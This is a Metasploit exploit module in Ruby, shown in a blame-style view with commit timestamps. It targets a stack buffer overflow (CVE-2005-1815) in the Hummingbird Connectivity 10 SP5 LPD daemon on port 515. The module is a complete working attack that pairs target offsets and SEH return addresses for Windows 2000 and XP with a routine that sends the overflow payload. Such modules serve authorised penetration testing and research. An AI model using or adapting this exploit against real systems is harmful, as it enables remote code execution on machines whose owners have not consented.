2007-02-18 00:10:39 +00:00
|
|
|
##
|
2007-03-01 08:21:36 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
2006-09-12 05:58:09 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = AverageRanking
|
2006-09-12 05:58:09 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Exploit::Remote::Seh
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-09-12 05:58:09 +00:00
|
|
|
def initialize(info = {})
|
2010-04-30 08:40:19 +00:00
|
|
|
super(update_info(info,
|
2006-09-12 05:58:09 +00:00
|
|
|
'Name' => 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow',
|
|
|
|
'Description' => %q{
|
2010-05-09 17:45:00 +00:00
|
|
|
This module exploits a stack buffer overflow in Hummingbird Connectivity
|
2006-09-12 05:58:09 +00:00
|
|
|
10 LPD Daemon. This module has only been tested against Hummingbird
|
|
|
|
Exceed v10 with SP5.
|
|
|
|
},
|
|
|
|
'Author' => [ 'MC' ],
|
|
|
|
'License' => MSF_LICENSE,
|
2007-02-18 00:10:39 +00:00
|
|
|
'Version' => '$Revision$',
|
2006-09-12 05:58:09 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
2009-06-07 20:20:42 +00:00
|
|
|
['CVE', '2005-1815'],
|
2010-09-20 08:06:27 +00:00
|
|
|
['OSVDB', '16957'],
|
2006-09-12 05:58:09 +00:00
|
|
|
['BID', '13788'],
|
|
|
|
],
|
|
|
|
'Privileged' => true,
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-09-12 05:58:09 +00:00
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 500,
|
|
|
|
'BadChars' => "\x00\x0a",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
2010-04-30 08:40:19 +00:00
|
|
|
'Targets' =>
|
2006-09-12 05:58:09 +00:00
|
|
|
[
|
|
|
|
['Windows 2000 English SP0-SP4', { 'Offset' => 1620, 'Ret' => 0x75022ac4 }],
|
|
|
|
['Windows XP English SP0/SP1', { 'Offset' => 1596, 'Ret' => 0x71aa2461 }],
|
|
|
|
],
|
|
|
|
|
|
|
|
'DisclosureDate' => 'May 27 2005'))
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
register_options( [ Opt::RPORT(515) ], self.class )
|
2006-09-12 05:58:09 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
connect
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-03-01 08:21:36 +00:00
|
|
|
filler = rand_text_english(target['Offset'], payload_badchars)
|
2006-09-12 05:58:09 +00:00
|
|
|
seh = generate_seh_payload(target.ret)
|
|
|
|
sploit = filler + seh
|
|
|
|
|
|
|
|
print_status("Trying target #{target.name}...")
|
|
|
|
sock.put(sploit)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-09-12 05:58:09 +00:00
|
|
|
handler
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
|
2009-06-07 20:20:42 +00:00
|
|
|
end
|